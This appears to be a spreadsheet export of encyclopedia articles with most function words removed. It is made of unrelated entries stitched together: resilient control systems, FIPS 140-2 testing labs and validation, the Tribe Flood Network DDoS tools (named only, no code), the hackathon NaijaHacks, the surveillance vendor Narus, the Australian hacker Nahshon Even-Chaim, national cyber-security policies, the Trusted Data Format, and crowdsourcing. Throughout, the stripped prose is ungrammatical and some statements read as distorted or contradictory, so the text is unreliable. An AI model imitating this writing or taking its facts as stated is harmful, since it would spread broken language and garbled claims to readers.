factors. general, idea base metric “what expected” necessarily actual initiator degradation. considering time metrics basis, resilient un-resilient systems observed fig. dependent upon abscissa metrics chosen, fig. reflects generalization resiliency system. several common terms represented graphic, including robustness, agility, adaptive capacity, adaptive insufficiency, resiliency brittleness. overview definitions terms, following explanations provided below: agility: derivative disturbance curve. this average defines ability system resist degradation downward slope, also recover upward. primarily considered time based term indicates impact mission. considers short term system longer term human responder actions. adaptive capacity: ability system adapt transform impact maintain minimum normalcy. considered value fully operational resilience threshold. adaptive insufficiency: inability system adapt transform impact, indicating unacceptable performance loss disturbance. considered value resilience threshold total loss operation. brittleness: area disturbance curve intersected resilience threshold. this indicates impact loss operational normalcy. phases resilient control system preparation disturbance response: recon: maintaining proactive state awareness system conditions degradation resist: system response recognized conditions, mitigate counter respond: system degradation stopped returning system performance restore: longer term performance restoration, includes equipment replacement resiliency: converse brittleness, resilience system “zero” loss minimum normalcy. robustness: positive negative number associated area disturbance curve resilience threshold, indicating either capacity insufficiency, respectively.on abscissa fig. recognized cyber cognitive influences affect data time, underscores relative importance recognizing forms degradation resilient control designs. cybersecurity, single cyberattack degrade control system multiple ways. additionally, control impacts characterized indicated. while terms fundamental seem little value correlating impact terms like cost, development cases provide means relevance codified. example, given impact system dynamics data, performance control loop directly ascertained show approach instability operational impact. resilience manifold design operation nature control systems implies starting point development resilience metrics. that control physical process based upon quantifiable performance measures, including first principles stochastic. ability provide measurement, basis correlating operational performance adaptation, also becomes starting point correlation data time variations come cognitive, cyber-physical sources. effective understanding based upon developing manifold adaptive capacity correlates design (and operational) buffer. power system, manifold based upon real reactive power assets, controllable latitude maneuver, impact disturbances time. modern distribution system (mds), assets aggregated individual contributions shown fig. figure, assets include: battery, alternate line source, asymmetric p/q-conjectured source, distribution static synchronous compensator (dstatcom), latency, four quadrant source energy limit. examples resilient control system developments when considering current digital control system designs, cyber security systems dependent upon considered border protections, i.e., firewalls, passwords, etc. malicious actor compromised digital control system industrial operation man-in-the-middle attack, data corrupted control system. industrial facility operator would knowing data compromised, someone security engineer recognized attack occurring. operators trained provide prompt, appropriate response stabilize industrial facility, likelihood corrupt data would lead operator reacting situation lead plant upset. resilient control system, fig. cyber physical data fused recognize anomalous situations warn operator.2) society becomes automated variety drivers, including energy efficiency, need implement ever effective control algorithms naturally follow. however, advanced control algorithms dependent upon data multiple sensors predict behaviors industrial operation make corrective responses. this type system become brittle, insofar unrecognized degradation sensor lead incorrect responses control algorithm potentially worsened condition relative desired operation industrial facility. therefore, implementation advanced control algorithms resilient control system also requires implementation diagnostic prognostic architectures recognize sensor degradation, well failures industrial process equipment associated control algorithms. resilient control system solutions need interdisciplinary education world advancing automation, dependence upon advancing technologies require educated skill sets multiple disciplines. challenges appear simply rooted better design control systems greater safety efficiency. however, evolution technologies current design automation created complex environment cyber-attack, human error (whether design operation), damaging storm wreak havoc basic infrastructure. next generation systems need consider broader picture ensure path forward failures lead ever greater catastrophic events. critical resource students expected develop skills necessary advance designs, require perspective challenges contributions others fulfill need. addressing need, courses developed provide perspectives relevant examples overview issues provide opportunity create resilient solutions universities george mason university northeastern. critical infrastructure operations important aspect courses. through development technologies designed stage next generation automation, become evident effective teams comprised several disciplines. however, developing level effectiveness time consuming, done professional environment expend energy time provides little obvious benefit desired outcome. clear earlier stem disciplines successfully integrated, effective recognizing other’s contributions working together achieve common goals professional world. team competition venues resilience week natural outcome developing environment, allowing interdisciplinary participation providing exciting challenge motivate students pursue stem education. standardizing resilience resilient control system principles standards policy define resilience nomenclature metrics needed establish value proposition investment, includes government, academia industry. ieee industrial electronics society taken lead forming technical committee toward end. purpose committee establish metrics standards associated codifying promising technologies promote resilience automation. this effort distinct supply chain community focus resilience security, efforts nist notes references cholda, tapolcai, cinkler, wajda, jajszczyk, (2009), "quality resilience network reliability characterization tool", ieee network, (2): 11–19, doi:10.1109/mnet.2009.4804331, s2cid 8610971 staff (may 2005), critical infrastructure protection, department homeland security faces challenges fulfilling cybersecurity responsibilities, gao-05-434, government hollnagel, woods, leveson, (2006), resilience engineering: concepts precepts, aldershot hampshire, ashgate publishing kuo, (june 1995), digital control systems, oxford university press lin, sedigh, hurson, a.r. (may 2011), agent-based approach reconciling data heterogeneity cyber-physical systems, 25th ieee international symposium parallel distributed processing workshops forum (ipdpsw), 93–103 meyer, (september 2009), defining evaluating resilience: performability perspective, presentation international workshop performability modeling computer communication systems mitchell, mannan, (april 2006), "designing resilient engineered systems", chemical engineering progress, (4): 39–45 rieger, (august 2010), notional examples benchmark aspects resilient control system, international symposium resilient control systems, 64–71 rinaldi, peerenboom, kelly, (december 2001), "identifying, understanding analyzing critical infrastructure interdependencies", ieee control systems magazine: 11–25 trivedi, dong, ghosh, (december 2009), resilience computer systems networks, ieee/acm international conference computer-aided design-digest technical papers, 74–77 wang, f.y.; liu, (2008), networked control systems: theory applications, london, springer-verlag wei, (august 2010), resilient industrial control system (rics): concepts, formulation, metrics, insights, international symposium resilient control systems (isrcs), 15–22 wing, (april 2008), cyber-physical systems research charge, louis, missouri: cyber-physical systems summitattribution this article incorporates public domain material websites documents united states government. rieger, c.g.; gertman, d.i.; mcqueen, m.a. (may 2009), resilient control systems: next generation design research, catania, italy: ieee conference human system interaction rieger, craig gertman, david mcqueen, miles (may 2009), resilient control systems: next generation design research (hsi 2009) (pdf), idaho national laboratory (inl)</t>
  </si>
  <si>
    <t>Cryptographic Module Testing Laboratory</t>
  </si>
  <si>
    <t>cryptographic module testing laboratory (cmtl) information technology (it) computer security testing laboratory accredited conduct cryptographic module evaluations conformance fips 140-2 u.s. government standard. national institute standards technology (nist) national voluntary laboratory accreditation program (nvlap) accredits cmtls meet cryptographic module validation program (cmvp) standards procedures. this replaced fips 140-2 cryptographic module validation program (cmvp). cmtl requirements these laboratories must meet following requirements: nist handbook 150, nvlap procedures general requirements nist handbook 150-17 information technology security testing cryptographic module testing nvlap specific operations checklist cryptographic module testing fips 140-2 relation common criteria cmtl also common criteria (cc) testing laboratory (cctl). fips 140-2 different abstractness focus tests. fips 140-2 testing defined cryptographic module provides suite conformance tests four fips security levels. fips 140-2 describes requirements cryptographic modules includes areas physical security, management, self tests, roles services, etc. standard initially developed 1994 prior development evaluation protection profile (pp), usually created user, security target (st). typically, covers broad range products. evaluation supersede replace validation either fips 140-1 fips 140-2. four security levels fips 140-1 fips 140-2 directly specific eals functional requirements. certificate cannot substitute fips 140-1 fips 140-2 certificate.if operational environment modifiable operational environment, operating system requirements common criteria applicable fips security levels above. fips 140-1 required evaluated operating systems referenced trusted computer system evaluation criteria (tcsec) classes however, tcsec longer replaced common criteria. consequently, fips 140-2 references common criteria. external links list cmtls nist</t>
  </si>
  <si>
    <t>Cryptographic Module Validation Program</t>
  </si>
  <si>
    <t>cryptographic module validation program (cmvp) joint american canadian security accreditation program cryptographic modules. program available vendors seek products certified u.s. government regulated industries (such financial health-care institutions) collect, store, transfer, share disseminate "sensitive, classified" information. tests cmvp handled third-party laboratories accredited cryptographic module testing laboratories national voluntary laboratory accreditation program (nvlap). product certifications cmvp performed accordance requirements fips 140-2. cmvp established u.s. national institute standards technology (nist) communications security establishment (cse) government canada july 1995. cryptographic algorithm validation program (cavp), provides guidelines validation testing fips approved nist recommended cryptographic algorithms components algorithms, prerequisite cmvp. notes external links nist cryptographic module validation program nist fips 140-2</t>
  </si>
  <si>
    <t>Tribe Flood Network</t>
  </si>
  <si>
    <t>tribe flood network computer programs conduct various ddos attacks icmp flood, flood, flood smurf attack. first initiated attacks described cert incident note 99-04. tfn2k written mixter, security professional hacker based germany. also external links tribe flood network tfn2k analysis jason barlow woody thrower axent security team tfn2k source code</t>
  </si>
  <si>
    <t>NaijaHacks</t>
  </si>
  <si>
    <t>naijahacks hackathon tech invention competition nigerian, aims encourage youth technology create solutions communities world using technologies including blockchain artificial intelligence. officially, naijahacks described official national "movement makers, leaders, disruptors".founded 2018 software engineer uchi uchibeke (formerly shopify founder africahacks), naijahacks africa's largest hackathon. naijahacks inspired uchi's experience attending major league hacking hackathons stanford, harvard, princeton others. 2018, naijahacks participants projects, 2019 naijahacks became largest hackathon africa projects submitted. history naijahacks 2018 2018, naijahacks started virtually culminated expo-style demo award ceremony zone tech park, lagos, nigeria. naijahacks 2019 2019 naijahacks included keynote speech chude jideonwo culminated demo zone tech park, lagos, nigeria. 200+ projects submitted projects transformed hackathon idea startup africahacks, also founded uchi uchibeke.processes naijahacks include: application team formation building submission live demo references</t>
  </si>
  <si>
    <t>Narus (company)</t>
  </si>
  <si>
    <t>narus inc. software company vendor data analytics cybersecurity. history 1997, cohen, vice president business technology development vdonet, founded narus stas khirman israel. presently, employed deutsche telekom members narus' executive team. 2010, narus became subsidiary boeing, located sunnyvale, california. 2015, narus sold symantec. management 2004, narus employed former deputy director national security agency, william crowell director. from press release announcing this: crowell independent security consultant holds several board positions variety technology technology-based security companies. since september 2001, crowell served defense advanced research projects agency (darpa) task force terrorism deterrence, national research council committee science technology countering terrorism markle foundation task force national security information age. narus software narus software primarily captures various computer network traffic real time analyzes results.prior 9/11 narus built carrier-grade tools analyze network traffic billing purposes, prevent narus called "revenue leakage". post-9/11 narus added "semantic monitoring abilities" surveillance. mobile narus provided telecom egypt deep packet inspection equipment, content-filtering technology allows network managers inspect, track target content users internet mobile phones, passes routers. national telecommunications authorities pakistan saudi arabia global narus customers. controversies at&amp;t wiretapping room narus supplied software hardware used at&amp;t wiretapping rooms, according whistleblowers thomas drake, mark klein. also carnivore (software) communications assistance enforcement computer surveillance echelon hepting at&amp;t, 2006 lawsuit electronic frontier foundation alleges at&amp;t allowed entirety clients' internet voice communications using narus equipment. lincoln (surveillance) room 641a sigint total information awareness verint systems references external links wired news article wired news article (at&amp;t whistleblower mark klein discusses narus 6400) documents, including pictures, wiring diagrams, equipment lists installation dates, mark klein wayback machine (archived december 2007) frontline flash video "spying home front" documentary originally aired 2007 section entitled "the nsa's eavesdropping at&amp;t" story mark klein exposing wiretapping secure room narus 6400 at&amp;t facility francisco,</t>
  </si>
  <si>
    <t>Nahshon Even-Chaim</t>
  </si>
  <si>
    <t>nahshon even-chaim (born 1971), phoenix, first major computer hacker convicted australia. highly skilled members computer hacking group called realm, based melbourne, australia, late 1980s arrest australian federal police early 1990. targets centered defense nuclear weapons research networks. trail evidence even-chaim began breaking systems dialing indirectly placing call x.25 networks, later taking advantage internet connectivity became available. developed reputation within realm, computer hacking group, skill arrogance. late 1988 australian federal police officers discovered identity using combination undercover work informants. aided computer crime legislation came force june 1989, obtained warrant january 1990 eavesdrop even-chaim's phone conversations also data transmitted modem. voice calls, began january 1990, eight weeks, data started weeks later weeks. intercepts monitored telephone intercept branch canberra, even-chaim's home.both intercepts provided police sufficient evidence prosecute members hacking group, richard jones, a.k.a. electron david john woodcock, a.k.a. nom. data taps revealed even-chaim spent marathon sessions computer, working rapid pace enter tamper computer systems. first time world remote data intercept used gain evidence computer crime prosecution.transcripts phone taps captured even-chaim laughing another hacker "fucking nasa", adding: "yeah, they're gonna really want bad. this fun!" another conversation, time american hacker, claimed: "the guys local universities screaming rage americans getting pretty damn pissed much can't much getting point almost system internet. i've virtually raped internet beyond belief."accounts police investigation identified even-chaim offenders, well arrest prosecution, contained book hackers: hunt australia’s most infamous computer cracker, co-written bill apro, computer crime investigator investigation, book underground: tales hacking, madness obsession electronic frontier suelette dreyfus realm hackers, film kevin anderson. even-chaim's targets even-chaim pleaded guilty charges, involved intrusion computers commonwealth scientific industrial research organisation melbourne, gained unauthorised access copied zardoz, computer industry bulletin identifying security weaknesses unix operating systems; university california, berkeley (inserting data); nasa virginia (accessing data, inserting data, altering data, obstructing lawful nasa computer); execucom, software technology company austin, texas (altering data, erasing data); lawrence livermore national laboratory, livermore, california (altering data, interfering computer); university wisconsin–madison (inserting data); purdue university, west lafayette, indiana (inserting data).after allegedly compromising computers used computer security experts eugene spafford, clifford stoll, russell brand llnl), even-chaim called york times journalist john markoff response article markoff attributed recent spate computer break-ins worm. even-chaim boasted markoff break-ins work associates, ridiculed computer security community, claiming: used security guys chasing hackers. now, hackers chasing security guys." markoff published claims follow-up article march 1990. raid aftermath early hours april 1990, even-chaim's home caulfield north, suburban melbourne, raided australian federal police arrested. simultaneously, raided homes fellow realm members jones woodcock. even-chaim charged offenses, carried maximum 10-year jail sentence. october 1993, even-chaim, negotiated deal would plead guilty number charges reduced sentenced hours community service, 12-month suspended jail term. unlike co-accused, revealed little police interview court might explain motivation hacking. even-chaim apparently worked least time conviction pursued interest music. despite approaches newspaper 2003 producer television documentary realm, even-chaim declined discuss hacking career. also list convicted computer criminals references books suelette dreyfus (1997). underground: tales hacking, madness obsession electronic frontier. mandarin. isbn 1-86330-595-5. (free electronic edition) bill apro graeme hammond (2005). hackers: hunt australia's most infamous computer cracker. five mile press. isbn 1-74124-722-5.newspapers hack future, sunday age, 2003. nailed master hacker, sunday herald sun, july 2005.magazines hackers 'plan revenge' police clampdown computer crime: extract scientist article arrest hackers, april 1990: [2]film realm hackers, written directed kevin anderson, (film australia, 2003, minutes). [3]e-zines: reprint article hacker revelled spotlight, court told (the age, 1993) phrack. reference article york times, april 1990, arrest hackers risks digest. external links crimes legislation amendment 1989 dealing offenses relating computers</t>
  </si>
  <si>
    <t>National Cyber Security Centre (New Zealand)</t>
  </si>
  <si>
    <t>national cyber security centre zealand branch government communications security bureau. they assisting waikato district health board 2021 attack systems. references external links national cyber security centre homepage</t>
  </si>
  <si>
    <t>National Cyber Security Policy 2013</t>
  </si>
  <si>
    <t>national cyber security policy policy framework department electronics information technology (deity) aims protecting public private infrastructure cyber attacks. policy also intends safeguard "information, personal information users), financial banking information sovereign data". this particularly relevant wake national security agency (nsa) leaks suggested government agencies spying indian users, legal technical safeguards ministry communications information technology (india) defines cyberspace complex environment consisting interactions people, software services supported worldwide distribution information communication technology. reason cyber security policies india cyber security policy 2013. 2013, hindu newspaper, citing documents leaked whistle-blower edward snowden, alleged much surveillance focused india's domestic politics strategic commercial interests. this sparked furore among people. under pressure, government unveiled national cyber security policy 2013 july 2013. vision build secure resilient cyberspace citizens, business, government also protect anyone intervening user's privacy. mission protect information information infrastructure cyberspace, build capabilities prevent respond cyber threat, reduce vulnerabilities minimize damage cyber incidents combination institutional structures, people, processes, technology, cooperation. objective ministry communications information technology (india) define objectives follows: create secure cyber ecosystem country, generate adequate trust confidence system transactions cyberspace thereby enhance adoption sectors economy. create assurance framework design security policies promotion enabling actions compliance global security standards best practices conformity assessment (product, process, technology people). strengthen regulatory framework ensuring secure cyberspace ecosystem. enhance create national sectoral level 24x7 mechanism obtaining strategic information regarding threats infrastructure, creating scenarios response, resolution crisis management effective predictive, preventive, protective response recovery actions.-to improve visibility integrity products services establishing infrastructure testing validation security product. create workforce 500,000 professionals skilled next years capacity building skill development training. provide fiscal benefit businesses adoption standard security practices processes. enable protection information process, handling, storage transit safeguard privacy citizen's data reducing economic losses cyber crime data theft. enable effective prevention, investigation prosecution cybercrime enhancement enforcement capabilities appropriate legislative intervention. strategies creating secured ecosystem. creating assurance framework. encouraging open standards. strengthening regulatory framework. creating mechanism security threats early warning, vulnerability management, response security threats. securing e-governance services. protection resilience critical information infrastructure. promotion research development cyber security. reducing supply chain risks human resource development (fostering education training programs formal informal sectors support nation's cyber security needs build capacity. creating cyber security awareness. developing effective public-private partnerships. develop bilateral multilateral relationships area cyber security another country. (information sharing cooperation) prioritized approach implementation. also national security strategy (india) references external links "national cyber security policy 2013" (pdf). department information technology, ministry communications information technology. indian cyber security</t>
  </si>
  <si>
    <t>Trusted Data Format</t>
  </si>
  <si>
    <t>trusted data format (tdf) data object encoding specification purposes enabling data tagging cryptographic security features. these features include assertion data properties tags, cryptographic binding data encryption. freely available restrictions requires proprietary patented technology thus open anyone use. overview specification based trusted data object (tdo) grouped together trusted data collection (tdc). each consists data payload associated unlimited number metadata objects. supports cryptographic binding metadata objects payload data object. addition, data metadata objects associated block encryption information used consumer decrypt associated data metadata encrypted. allows additional metadata objects apply tdos. implementations united states intelligence community maintains ic-tdf, includes government-specific tagging requirements core capabilities mentioned above, data encoding specification. virtru offers client-side email file encryption based tdf.the united states department defense uses implement department defense discovery metadata specification (ddms). references external links office director national intelligence website specification wood, mollie, easier ways protect email from unwanted prying eyes, york times, july 2014 video article</t>
  </si>
  <si>
    <t>Crowdsource</t>
  </si>
  <si>
    <t>crowdsourcing involves large group dispersed participants contributing producing goods services—including ideas, voting, micro-tasks, finances—for payment volunteers. contemporary crowdsourcing often involves digital platforms attract divide work participants achieve cumulative result; however, always online activity, various historical examples crowdsourcing. word crowdsourcing portmanteau "crowd" "outsourcing". contrast outsourcing, crowdsourcing usually involves less-specific, public groups.advantages using crowdsourcing include improved costs, speed, quality, flexibility, scalability, diversity. common crowdsourcing methods include competitions, virtual labor markets, open online collaboration data donation. some forms crowdsourcing, "idea competitions" "innovation contests" provide ways organizations learn beyond "base minds" provided employees (e.g. lego ideas). commercial platforms, amazon mechanical turk, match microtasks submitted requesters workers perform them. not-for-profit organizations used crowdsourcing develop common goods (e.g. wikipedia). definitions term crowdsourcing coined 2006 jeff howe mark robinson, editors wired, describe businesses using internet "outsource work crowd," quickly portmanteau "crowdsourcing". howe published definition term blog post june 2006: simply defined, crowdsourcing represents company institution taking function performed employees outsourcing undefined (and generally large) network people form open call. this take form peer-production (when performed collaboratively), also often undertaken sole individuals. crucial prerequisite open call format large network potential laborers. daren brabham defined crowdsourcing "online, distributed problem-solving production model." kristen guth brabham found performance ideas offered crowdsourcing platforms affected quality, also communication among users ideas, presentation platform itself. after studying definitions crowdsourcing scientific popular literature, enrique estellés-arolas fernando gonzález ladrón-de-guevara, researchers technical university valencia, developed integrating definition: crowdsourcing either take explicit implicit route. explicit crowdsourcing lets users work together evaluate, share, build different specific tasks, implicit crowdsourcing means users solve problem side effect something else doing. with explicit crowdsourcing, users evaluate particular items like books webpages, share posting products items. users also build artifacts providing information editing people's work. implicit crowdsourcing take forms: standalone piggyback. standalone allows people solve problems side effect task doing, whereas piggyback takes users' information third-party website gather information. despite multiplicity definitions crowdsourcing, constant broadcasting problems public, open call contributions help solve problem. members public submit solutions owned entity, originally broadcast problem. cases, contributor solution compensated monetarily prizes recognition. cases, rewards kudos intellectual satisfaction. crowdsourcing produce solutions amateurs volunteers working spare time experts small businesses, previously unknown initiating organization. historical examples while term "crowdsourcing" popularized online describe internet-based activities, examples projects, retrospect, described crowdsourcing. timeline crowdsourcing examples 618–907 tang dynasty introduces joint-stock company, earliest form crowdfunding 1567 king philip spain offers cash prize calculating longitude vessel whilst sea. 1714 longitude rewards: when british government trying find measure ship's longitudinal position, offered public monetary prize whomever came best solution. 1783 king louis offered award person could "make alkali" decomposing salt "simplest economic method". 1848 matthew fontaine maury distributed 5000 copies wind current charts free charge condition sailors returned standardized voyage u.s. naval observatory. 1861, distributed 200,000 copies free charge, conditions. 1849 network volunteer weather observers part smithsonian institution's meteorological project started smithsonian's first secretary, joseph henry, used telegraph gather volunteers' data create large weather map, making information available public daily. instance, volunteers tracked tornado passing wisconsin sent findings telegraph smithsonian. henry's project considered origin later became national weather service. within decade, project volunteer observers spread canada, mexico, latin america, caribbean. 1884 publication oxford english dictionary: volunteers catalogued words create first fascicle oed. 1916 planters peanuts contest: peanut logo designed 14-year-old planter peanuts logo contest. 1957 jørn utzon, winner design competition sydney opera house. 1970 french amateur photo contest c'était paris 1970 ("this paris 1970") sponsored city paris, france-inter radio, fnac: 14,000 photographers produced 70,000 black-and-white prints 30,000 color slides french capital document architectural changes paris. photographs donated bibliothèque historique ville paris. 1979 robert axelrod invites academics on-line submit fortran algorithms play repeated prisoner's dilemma; results tat. 1991 linus torvalds begins work linux operating system, inviting programmers around world contribute code. 1996 hollywood stock exchange founded: allowed buying selling shares. 1997 british rock band marillion raised $60,000 fans help finance u.s. tour. 1999 seti@home launched university california, berkeley. volunteers contribute searching signals might come extraterrestrial intelligence installing program uses idle computer time analyzing chunks data recorded radio telescopes involved serendip program. 2000 justgiving established: this online platform allows public help raise money charities. 2000 online volunteering service launched: connecting people commit time skills internet help organizations address development challenges. 2000 istockphoto founded: free stock imagery website allows public contribute receive commission contributions. 2001 launch wikipedia: "free-access, free content internet encyclopedia". 2001 foundation topcoder crowdsourcing software development company. 2004 openstreetmap, collaborative project create free editable world, launched. 2004 toyota's first "dream art" contest: children asked globally draw "dream future". 2005 kodak's gold" contest: kodak asked anyone submit picture personal victory. 2009 waze, community-oriented app, allows users submit road info route data based location, reports accidents traffic, integrates data routing algorithms users app. 2010 1947 partition archive, oral history project asked community members around world document oral histories aging witnesses significant under-documented historical event, 1947 partition india pakistan, submit online project made possible modern digital internet communications. 2011 casting flavours flavor usa) campaign launched pepsico's lay's spain. campaign contest held initiating flavor snack. 2012 crowdsourcing week platform launches singapore. 2019 crowdsourcing week launches global bold awards recognize achievements innovations crowdsourcing related technology. early competitions crowdsourcing often used past competition discover solution. french government proposed several competitions, often rewarded montyon prizes, created poor frenchmen done virtuous acts. these included leblanc process, alkali prize, reward provided separating salt alkali, fourneyron's turbine, first hydraulic commercial turbine developed.in response challenge french government, nicolas appert prize inventing food preservation involved sealing food air-tight jars. british government provided similar reward find easy determine ship's longitude longitude prize. during great depression, out-of-work clerks tabulated higher mathematical functions mathematical tables project outreach project. biggest crowdsourcing campaigns public design contest 2010, hosted indian government's finance ministry create symbol indian rupee. thousands people sent entries government zeroed final symbol based devanagari script using letter applications number motivations exist businesses crowdsourcing accomplish tasks, find solutions problems, gather information. these include ability offload peak demand, access cheap labor information, generate better results, access wider array talent might present organization, undertake problems would difficult solve internally. crowdsourcing allows businesses submit problems contributors work—on topics science, manufacturing, biotech, medicine—with monetary rewards successful solutions. although crowdsourcing complicated tasks difficult, simple work tasks crowdsourced cheaply effectively.crowdsourcing also potential problem-solving mechanism government nonprofit use. urban transit planning prime areas crowdsourcing. project test crowdsourcing's public participation process transit planning salt lake city carried 2008 2009, funded u.s. federal transit administration grant. another notable application crowdsourcing government problem-solving peer patent community patent review project u.s. patent trademark office.researchers used crowdsourcing systems like mechanical turk research projects crowdsourcing aspects research process, data collection, parsing, evaluation. notable examples include using crowd create speech language databases, using crowd conduct user studies. crowdsourcing systems provide researchers ability gather large amounts data. additionally, using crowdsourcing, researchers collect data populations demographics access locally, improve validity value work.artists also used crowdsourcing systems. project called sheep market, aaron koblin used mechanical turk collect 10,000 drawings sheep contributors around world. artist brown leverages crowd asking visitors website explodingdog send sentences uses inspirations paintings. curator andrea grover argues individuals tend open crowdsourced projects physically judged scrutinized. crowdsourcers, artists crowdsourcing systems generate collect data. crowd also used provide inspiration collect financial support artist's work.additionally, crowdsourcing million drivers used inrix collect users' driving times provide better routing real-time traffic updates. science astronomy crowdsourcing astronomy used early 19th century astronomer denison olmsted. after awakened late november night meteor shower taking place, olmsted noticed pattern shooting stars. olmsted wrote brief report meteor shower local newspaper. cause 'falling stars' understood meteorologists, desirable collect facts attending phenomenon, stated much precision possible," olmsted wrote readers, report subsequently picked pooled newspapers nationwide. responses came pouring many states, along scientists' observations sent american journal science arts. these responses helped make series scientific breakthroughs, major discovery meteor showers seen nationwide, fall space influence gravity. also, demonstrated showers appeared yearly cycles, fact often eluded scientists. responses allowed suggest velocity meteors, although estimate turned conservative. taken responses presented, conjecture meteors' velocity would closer actual speed. recent version crowdsourcing astronomy nasa's photo organizing project, asks internet users browse photos taken space identify location picture documenting. energy system research energy system models require large diverse datasets, increasingly given trend towards greater temporal spatial resolution. response, several initiatives crowdsource data. launched december 2009, openei collaborative website, government, providing open energy data. while much information government sources, platform also seeks crowdsourced input around world. semantic wiki database enipedia also publishes energy systems data using concept crowdsourced open information. enipedia went live march 2011.: 184–188 genealogy research genealogical research using crowdsourcing techniques long personal computers common. beginning 1942, members church jesus christ latter-day saints encouraged members submit information ancestors. submitted information gathered together single collection. 1969, encourage people participate gathering genealogical information ancestors, church started three-generation program. program, church members asked prepare documented family group record forms first three generations. program later expanded encourage members research least four generations became known four-generation program.institutes records interest genealogical research used crowds volunteers create catalogs indices records. genetic genealogy research genetic genealogy combination traditional genealogy genetics. rise personal testing, turn century, companies gene gene, ftdna, genetree, 23andme, ancestry.com, public semi public databases testing uses crowdsourcing techniques. citizen science projects included support, organization, dissemination personal (genetic) testing. similar amateur astronomy, citizen scientists encouraged volunteer organizations like international society genetic genealogy, provided valuable information research professional scientific community. genographic project, began 2005, research project carried national geographic society's scientific team reveal patterns human migration using crowdsourced testing reporting results. ornithology another early example crowdsourcing occurred field ornithology. december 1900, frank chapman, early officer national audubon society, initiated tradition, dubbed "christmas bird census". project called birders across north america count record number birds species witnessed christmas day. project successful, records different contributors compiled bird census, tallied around species birds. this large-scale collection data constituted early form citizen science, premise upon crowdsourcing based. 2012 census, 70,000 individuals participated across 2,369 bird count circles. christmas 2014 marked national audubon society's 115th annual christmas bird count. seismology european-mediterranean seismological centre (emsc) developed seismic detection system monitoring traffic peaks website analysis keywords used twitter. journalism crowdsourcing increasingly used professional journalism. journalists able crowdsource information crowd typically fact checking information, using information gathered articles fit. leading daily newspaper sweden successfully used crowdsourcing investigating home loan interest rates country 2013–2014, resulting 50,000 submissions. leading daily newspaper finland crowdsourced investigation stock short-selling 2011–2012, crowdsourced information revelations sketchy evasion system finnish bank. bank executive fired policy changes followed. talkingpointsmemo united states asked readers examine 3000 emails concerning firing federal prosecutors 2008. british newspaper guardian crowdsourced examination hundreds thousands documents 2009. data donation data donation crowdsourcing approach digital data gathering used researchers organizations gain access data online platforms, websites, search engines apps devices. data donation projects usually rely participants volunteering authentic digital profile information. examples include: dataskop, developed algorithm watch, non-profit research organization germany, access data social media algorithms automated decision-making systems. mozilla rally, mozilla foundation behind firefox browser, participants browser extension provide access data research projects. australian search experience observatory projects 2021 researchers centre excellence automated decision-making society (adm+s) australia using data donations analyze google personalizes search results, examine facebook's algorithmic advertising model works. citizen browser project, developed markup, designed measure disinformation travels across social media platforms time. public policy crowdsourcing public policy production public services also referred citizen sourcing. while scholars argue crowdsourcing policy tool definite means co-production others question argue crowdsourcing considered technological enabler simply increase speed ease participation. crowdsourcing also play role democratization.the first conference focusing crowdsourcing politics policy took place oxford university, auspices oxford internet institute 2014. research emerged since 2012 focuses crowdsourcing policy purposes. these include experimental investigation virtual labor markets policy assessment, assessment potential citizen involvement process innovation public administration.governments across world increasingly using crowdsourcing knowledge discovery civic engagement. iceland crowdsourced constitution reform process 2011, finland crowdsourced several reform processes address off-road traffic laws. finnish government allowed citizens online forum discuss problems possible resolutions regarding off-road traffic laws. crowdsourced information resolutions would passed legislators refer making decision, letting citizens directly contribute public policy. city palo alto crowdsourcing people's feedback comprehensive city plan update process, started 2015. house representatives brazil used crowdsourcing policy-reforms.nasa uses crowdsourcing analyzing large sets images, part open government initiative obama administration, general services administration collected amalgamated suggestions improving federal websites.for part obama trump administrations, people system collected signatures petitions, entitled official response white house certain number reached. several u.s. federal agencies inducement prize contests, including nasa environmental protection agency. language-related data crowdsourcing used extensively gathering language-related data. dictionary work applied hundred years oxford english dictionary editors, using paper postage. also used collecting examples proverbs specific topic (religious pluralism) printed journal. crowdsourcing language-related data online proven effective dictionary compilation projects, particularly specialist topics languages well documented, oromo language. software programs developed crowdsourced dictionaries, wesay. slightly different form crowdsourcing language data online creation scientific mathematical terminology american sign language.in linguistics, crowdsourcing strategies applied estimate word knowledge, vocabulary size, word origin. implicit crowdsourcing social media also helped efficiently approximate sociolinguistic data. reddit conversations various location-based subreddits analyzed presence grammatical forms unique regional dialect. these used extent speaker population. results could roughly approximate large-scale surveys subject without engaging field interviews.mining publicly available social media conversations used form implicit crowdsourcing approximate geographic extent speaker dialects. proverb collection also done crowdsourcing web, innovatively pashto language afghanistan pakistan. crowdsourcing extensively used collect high-quality gold standard creating automatic systems natural language processing (e.g. named entity recognition, entity linking). product design excellent example, lego world-renowned company creative. company allows users work product designs conducting requirements testing. user propose design, users vote design. user provide design product, users vote product. once submitted product received 10,000 votes, formally reviewed stages production impediments legal flaws identified. creator receives royalties income. business company uses marketplace platform model intermediary operate. business acts intermediary marketplace platform linking landlords passengers, allowing passengers complete transactions without needing single room. business model enterprise hand, extremely disruptive and, hand, simple. homeowners airbnb list accommodation cases, unused rooms. owners nightly, weekly monthly rates accommodations. business, turn, charges guests hosts fee. guests usually spending $15. they booking every time book room. landlord, turn, pays service amount due. company come long since founded 2008. company 1,500 properties 34,000 cities countries. other examples geography volunteered geographic information (vgi) geographic information generated crowdsourcing, opposed traditional methods professional geographic information (pgi). describing built environment, many advantages pgi, primarily perceived currency, accuracy authority. openstreetmap example crowdsourced mapping project. engineering many companies introducing crowdsourcing grow engineering capabilities find solutions unsolved technical challenges need adopt newest technologies printing iot. libraries, museums archives newspaper text correction national library australia early, influential example work text transcriptions crowdsourcing cultural heritage institutions. steve museum project provided prototype tagging artworks. crowdsourcing used libraries corrections digitized texts, tagging funding, especially absence financial human means. volunteers contribute explicitly conscious effort implicitly without known turning text newspaper image human corrected digital form. agriculture crowdsource research also reaches field agriculture. this mainly give farmers experts kind help identification different types weeds fields also give best remove weeds fields. cheating bridge boye brogeland initiated crowdsourcing investigation cheating top-level bridge players showed several players guilty, suspension. open source software crowdsourcing software development used extensively develop software healthcare research emerged outlines crowdsourcing techniques public health domain. collective intelligence outcomes crowdsourcing generated three broad categories public health care; health promotion, health research, health maintenance. crowdsourcing also enables researchers move small homogeneous groups participants large heterogenous groups, beyond convenience samples students higher educated people. sesh group focuses using crowdsourcing improve health.see list crowdsourcing projects examples. methods internet digital technologies massively expanded opportunities crowdsourcing. however effect user communication platform presentation major bearing success online crowdsourcing project. crowdsourced problem range huge tasks (such finding alien life mapping earthquake zones) small (identifying images). some examples successful crowdsourcing themes problems people, things make people feel good themselves, projects niche knowledge proud experts, subjects people find sympathetic form 